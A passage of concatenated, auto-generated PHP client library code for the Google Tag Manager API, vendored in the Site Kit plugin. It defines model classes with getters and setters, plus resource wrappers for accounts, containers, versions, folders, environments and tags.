* @return bool */ public function getSupportMultipleContainers() { return $this->supportMultipleContainers; } /** * @param bool */ public function setSupportUserPermissions($supportUserPermissions) { $this->supportUserPermissions = $supportUserPermissions; } /** * @return bool */ public function getSupportUserPermissions() { return $this->supportUserPermissions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountFeatures::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_AccountFeatures'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class GetWorkspaceStatusResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'workspaceChange'; protected $mergeConflictType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\MergeConflict::class; protected $mergeConflictDataType = 'array'; protected $workspaceChangeType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity::class; protected $workspaceChangeDataType = 'array'; /** * @param MergeConflict[] */ public function setMergeConflict($mergeConflict) { $this->mergeConflict = $mergeConflict; } /** * @return MergeConflict[] */ public function getMergeConflict() { return $this->mergeConflict; } /** * @param Entity[] */ public function setWorkspaceChange($workspaceChange) { $this->workspaceChange = $workspaceChange; } /** * @return Entity[] */ public function getWorkspaceChange() { return $this->workspaceChange; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GetWorkspaceStatusResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_GetWorkspaceStatusResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class PublishContainerVersionResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $compilerError; protected $containerVersionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class; protected $containerVersionDataType = ''; /** * @param bool */ public function setCompilerError($compilerError) { $this->compilerError = $compilerError; } /** * @return bool */ public function getCompilerError() { return $this->compilerError; } /** * @param ContainerVersion */ public function setContainerVersion(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion $containerVersion) { $this->containerVersion = $containerVersion; } /** * @return ContainerVersion */ public function getContainerVersion() { return $this->containerVersion; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\PublishContainerVersionResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_PublishContainerVersionResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ContainerVersionHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $containerVersionId; /** * @var bool */ public $deleted; /** * @var string */ public $name; /** * @var string */ public $numClients; /** * @var string */ public $numCustomTemplates; /** * @var string */ public $numGtagConfigs; /** * @var string */ public $numMacros; /** * @var string */ public $numRules; /** * @var string */ public $numTags; /** * @var string */ public $numTransformations; /** * @var string */ public $numTriggers; /** * @var string */ public $numVariables; /** * @var string */ public $numZones; /** * @var string */ public $path; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setContainerVersionId($containerVersionId) { $this->containerVersionId = $containerVersionId; } /** * @return string */ public function getContainerVersionId() { return $this->containerVersionId; } /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNumClients($numClients) { $this->numClients = $numClients; } /** * @return string */ public function getNumClients() { return $this->numClients; } /** * @param string */ public function setNumCustomTemplates($numCustomTemplates) { $this->numCustomTemplates = $numCustomTemplates; } /** * @return string */ public function getNumCustomTemplates() { return $this->numCustomTemplates; } /** * @param string */ public function setNumGtagConfigs($numGtagConfigs) { $this->numGtagConfigs = $numGtagConfigs; } /** * @return string */ public function getNumGtagConfigs() { return $this->numGtagConfigs; } /** * @param string */ public function setNumMacros($numMacros) { $this->numMacros = $numMacros; } /** * @return string */ public function getNumMacros() { return $this->numMacros; } /** * @param string */ public function setNumRules($numRules) { $this->numRules = $numRules; } /** * @return string */ public function getNumRules() { return $this->numRules; } /** * @param string */ public function setNumTags($numTags) { $this->numTags = $numTags; } /** * @return string */ public function getNumTags() { return $this->numTags; } /** * @param string */ public function setNumTransformations($numTransformations) { $this->numTransformations = $numTransformations; } /** * @return string */ public function getNumTransformations() { return $this->numTransformations; } /** * @param string */ public function setNumTriggers($numTriggers) { $this->numTriggers = $numTriggers; } /** * @return string */ public function getNumTriggers() { return $this->numTriggers; } /** * @param string */ public function setNumVariables($numVariables) { $this->numVariables = $numVariables; } /** * @return string */ public function getNumVariables() { return $this->numVariables; } /** * @param string */ public function setNumZones($numZones) { $this->numZones = $numZones; } /** * @return string */ public function getNumZones() { return $this->numZones; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersionHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ContainerVersionHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class SyncStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $mergeConflict; /** * @var bool */ public $syncError; /** * @param bool */ public function setMergeConflict($mergeConflict) { $this->mergeConflict = $mergeConflict; } /** * @return bool */ public function getMergeConflict() { return $this->mergeConflict; } /** * @param bool */ public function setSyncError($syncError) { $this->syncError = $syncError; } /** * @return bool */ public function getSyncError() { return $this->syncError; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_SyncStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnvironmentsResponse; /** * The "environments" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $environments = $tagmanagerService->accounts_containers_environments; * </code> */ class AccountsContainersEnvironments extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Environment. (environments.create) * * @param string $parent GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param Environment $postBody * @param array $optParams Optional parameters. * @return Environment * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class); } /** * Deletes a GTM Environment. (environments.delete) * * @param string $path GTM Environment's API relative path. Example: * accounts/{account_id}/containers/{container_id}/environments/{environment_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Environment. (environments.get) * * @param string $path GTM Environment's API relative path. Example: * accounts/{account_id}/containers/{container_id}/environments/{environment_id} * @param array $optParams Optional parameters. * @return Environment * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class); } /** * Lists all GTM Environments of a GTM Container. * (environments.listAccountsContainersEnvironments) * * @param string $parent GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListEnvironmentsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersEnvironments($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnvironmentsResponse::class); } /** * Re-generates the authorization code for a GTM Environment. * (environments.reauthorize) * * @param string $path GTM Environment's API relative path. Example: * accounts/{account_id}/containers/{container_id}/environments/{environment_id} * @param Environment $postBody * @param array $optParams Optional parameters. * @return Environment * @throws \Google\Service\Exception */ public function reauthorize($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('reauthorize', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class); } /** * Updates a GTM Environment. (environments.update) * * @param string $path GTM Environment's API relative path. Example: * accounts/{account_id}/containers/{container_id}/environments/{environment_id} * @param Environment $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the environment in storage. * @return Environment * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Environment::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersEnvironments::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersEnvironments'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder; use Google\Site_Kit_Dependencies\Google\Service\TagManager\FolderEntities; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListFoldersResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertFolderResponse; /** * The "folders" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $folders = $tagmanagerService->accounts_containers_workspaces_folders; * </code> */ class AccountsContainersWorkspacesFolders extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Folder. (folders.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Folder $postBody * @param array $optParams Optional parameters. * @return Folder * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class); } /** * Deletes a GTM Folder. (folders.delete) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * List all entities in a GTM Folder. (folders.entities) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return FolderEntities * @throws \Google\Service\Exception */ public function entities($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('entities', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\FolderEntities::class); } /** * Gets a GTM Folder. (folders.get) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param array $optParams Optional parameters. * @return Folder * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class); } /** * Lists all GTM Folders of a Container. * (folders.listAccountsContainersWorkspacesFolders) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListFoldersResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesFolders($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListFoldersResponse::class); } /** * Moves entities to a GTM Folder. If {folder_id} in the request path equals 0, * this will instead move entities out of the folder they currently belong to. * (folders.move_entities_to_folder) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param Folder $postBody * @param array $optParams Optional parameters. * * @opt_param string tagId The tags to be moved to the folder. * @opt_param string triggerId The triggers to be moved to the folder. * @opt_param string variableId The variables to be moved to the folder. * @throws \Google\Service\Exception */ public function move_entities_to_folder($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('move_entities_to_folder', [$params]); } /** * Reverts changes to a GTM Folder in a GTM Workspace. (folders.revert) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the tag in storage. * @return RevertFolderResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertFolderResponse::class); } /** * Updates a GTM Folder. (folders.update) * * @param string $path GTM Folder's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/folders/{folder_id} * @param Folder $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the folder in storage. * @return Folder * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesFolders::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesFolders'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion; use Google\Site_Kit_Dependencies\Google\Service\TagManager\PublishContainerVersionResponse; /** * The "versions" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $versions = $tagmanagerService->accounts_containers_versions; * </code> */ class AccountsContainersVersions extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Deletes a Container Version. (versions.delete) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a Container Version. (versions.get) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param array $optParams Optional parameters. * * @opt_param string containerVersionId The GTM ContainerVersion ID. Specify * published to retrieve the currently published version. * @return ContainerVersion * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class); } /** * Gets the live (i.e. published) container version (versions.live) * * @param string $parent GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * @return ContainerVersion * @throws \Google\Service\Exception */ public function live($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('live', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class); } /** * Publishes a Container Version. (versions.publish) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the container version in storage. * @return PublishContainerVersionResponse * @throws \Google\Service\Exception */ public function publish($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('publish', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\PublishContainerVersionResponse::class); } /** * Sets the latest version used for synchronization of workspaces when detecting * conflicts and errors. (versions.set_latest) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param array $optParams Optional parameters. * @return ContainerVersion * @throws \Google\Service\Exception */ public function set_latest($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('set_latest', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class); } /** * Undeletes a Container Version. (versions.undelete) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param array $optParams Optional parameters. * @return ContainerVersion * @throws \Google\Service\Exception */ public function undelete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('undelete', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class); } /** * Updates a Container Version. (versions.update) * * @param string $path GTM ContainerVersion's API relative path. Example: * accounts/{account_id}/containers/{container_id}/versions/{version_id} * @param ContainerVersion $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the container version in storage. * @return ContainerVersion * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersVersions::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersVersions'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Account; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListAccountsResponse; /** * The "accounts" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $accounts = $tagmanagerService->accounts; * </code> */ class Accounts extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets a GTM Account. (accounts.get) * * @param string $path GTM Account's API relative path. Example: * accounts/{account_id} * @param array $optParams Optional parameters. * @return Account * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Account::class); } /** * Lists all GTM Accounts that a user has access to. (accounts.listAccounts) * * @param array $optParams Optional parameters. * * @opt_param bool includeGoogleTags Also retrieve accounts associated with * Google Tag when true. * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListAccountsResponse * @throws \Google\Service\Exception */ public function listAccounts($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListAccountsResponse::class); } /** * Updates a GTM Account. (accounts.update) * * @param string $path GTM Account's API relative path. Example: * accounts/{account_id} * @param Account $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the account in storage. * @return Account * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Account $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Account::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\Accounts::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_Accounts'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateBuiltInVariableResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnabledBuiltInVariablesResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertBuiltInVariableResponse; /** * The "built_in_variables" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $built_in_variables = $tagmanagerService->accounts_containers_workspaces_built_in_variables; * </code> */ class AccountsContainersWorkspacesBuiltInVariables extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates one or more GTM Built-In Variables. (built_in_variables.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string type The types of built-in variables to enable. * @return CreateBuiltInVariableResponse * @throws \Google\Service\Exception */ public function create($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateBuiltInVariableResponse::class); } /** * Deletes one or more GTM Built-In Variables. (built_in_variables.delete) * * @param string $path GTM BuiltInVariable's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/built_in_v * ariables * @param array $optParams Optional parameters. * * @opt_param string type The types of built-in variables to delete. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Lists all the enabled Built-In Variables of a GTM Container. * (built_in_variables.listAccountsContainersWorkspacesBuiltInVariables) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListEnabledBuiltInVariablesResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesBuiltInVariables($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListEnabledBuiltInVariablesResponse::class); } /** * Reverts changes to a GTM Built-In Variables in a GTM Workspace. * (built_in_variables.revert) * * @param string $path GTM BuiltInVariable's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/built_in_v * ariables * @param array $optParams Optional parameters. * * @opt_param string type The type of built-in variable to revert. * @return RevertBuiltInVariableResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertBuiltInVariableResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesBuiltInVariables::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesBuiltInVariables'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTagsResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTagResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag; /** * The "tags" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $tags = $tagmanagerService->accounts_containers_workspaces_tags; * </code> */ class AccountsContainersWorkspacesTags extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Tag. (tags.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Tag $postBody * @param array $optParams Optional parameters. * @return Tag * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class); } /** * Deletes a GTM Tag. (tags.delete) * * @param string $path GTM Tag's API relative path. Example: accounts/{account_i * d}/containers/{container_id}/workspaces/{workspace_id}/tags/{tag_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Tag. (tags.get) * * @param string $path GTM Tag's API relative path. Example: accounts/{account_i * d}/containers/{container_id}/workspaces/{workspace_id}/tags/{tag_id} * @param array $optParams Optional parameters. * @return Tag * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class); } /** * Lists all GTM Tags of a Container. * (tags.listAccountsContainersWorkspacesTags) * * @param string $parent GTM Workspace's API relative path. Example: * 